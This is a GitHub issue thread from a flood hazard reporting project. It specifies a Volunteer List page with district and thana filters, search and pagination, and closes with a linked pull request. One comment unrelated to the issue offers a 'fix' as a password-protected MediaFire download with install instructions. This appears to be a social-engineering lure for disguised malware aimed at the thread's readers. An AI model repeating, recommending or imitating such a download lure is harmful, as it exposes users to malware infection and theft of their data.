### ISSUE TITLE
FE: Implement Volunteer List page based on new design

### ISSUE THREAD

**Issue by skfarhad** [skfarhad/hazard_reporting_system#48]
We need to implement the Volunteer List page based on new design.

- [ ]  Display list of Volunteers with all the fields and action column
- [ ]  Implement the filters on the top of the table for Volunteers , once filtered, the relevant Volunteers will be populated in the list items below
- [ ] Options for Status  dropdown: "Active", "Inactive" . Options will come from server.
- [ ] Options for District dropdown: "Feni", "Noakhali", "Habiganj", "Moulvibazar".... etc, list of flood affected district will come from server.
- [ ] For district "Feni", Options for Thana dropdown: "Chhagalnaiya", "Daganbhuiyan", "Feni Sadar"... etc, list of district wise thana will come from server.
- [ ] Implement the search on the top of the table for Volunteers , once searched, the relevant Volunteers  will be populated in the list items below. Search will be based on address and contact name
- [ ] Search operation will be on address and contact name. Query priority: address -> contact name
- [ ]  Implement the pagination feature
- [ ]  Place add and remove incident buttons without functionality
- [ ]  Implement the features mentioned above using fake json response. API integration will be done in a separate issue.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by aimun-naharr** [comment]
https://github.com/skfarhad/hazard_reporting_system/pull/19
![image](https://github.com/user-attachments/assets/5aa6c875-22dd-40aa-bf04-0d5b4a42cd43)

**Comment by skfarhad** [comment]
Implemented by this PR: https://github.com/skfarhad/hazard_reporting_system/pull/19
